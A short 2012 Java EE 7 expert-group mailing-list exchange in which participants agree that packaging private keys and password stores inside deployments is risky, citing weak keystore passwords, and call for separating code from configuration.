[javaee-spec users] [jsr342-experts] Re: Improved Credential and SSL Configuration for EE 7

From: Jevgeni Kabanov <>
Date: Fri, 9 Mar 2012 08:45:03 +0200

Agreed. We really need a better way to separate the code from configuration.


On Friday, March 9, 2012, Jason T. Greene wrote:

> On 3/8/12 6:09 PM, Bill Shannon wrote:
>> I've uploaded another proposal from our security team. Please review
>> and give us your feedback.
>> download/credential-ssl-**config-ee7-proposal.pdf<>
> Frankly the whole idea of sticking private keys and password databases in
> deployments seems like a major hazard. Developers are used to copying these
> around everywhere. I could easily see someone forgetting they have
> sensitive information in here. People also tend to use short and bad
> passwords in keystores which makes bruteforcing a PKCS12 file not that
> difficult.
> --
> Jason T. Greene
> JBoss AS Lead / EAP Platform Architect
> JBoss, a division of Red Hat